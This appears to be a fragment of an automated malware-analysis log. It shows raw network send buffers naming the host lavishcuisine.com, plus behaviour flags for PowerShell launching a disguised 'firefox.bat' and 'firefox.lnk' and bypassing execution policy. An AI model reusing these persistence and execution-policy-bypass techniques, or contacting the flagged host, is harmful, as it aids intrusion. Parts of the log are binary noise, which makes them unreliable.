buffer: tp`´Ht`Í·½µR΃ՄË $ô‘_vJHláï-k†/5 ÀÀÀ À 28/ÿlavishcuisine.com  
socket: 2028
sent: 121
1 121 0

send

buffer: tp`´HtÌ82ëºñš<ìZ½ÂíJ% kÊ«¶Ø{¿ÎÑx/5 ÀÀÀ À 28/ÿlavishcuisine.com  
socket: 2028
sent: 121
1 121 0
parent_process powershell.exe martian_process "C:\Users\Public\firefox.bat"
parent_process powershell.exe martian_process C:\ProgramData\Microsoft Arts\Start\firefox.lnk
option -executionpolicy bypass value Attempts to bypass execution policy
option -executionpolicy bypass value Attempts to bypass execution policy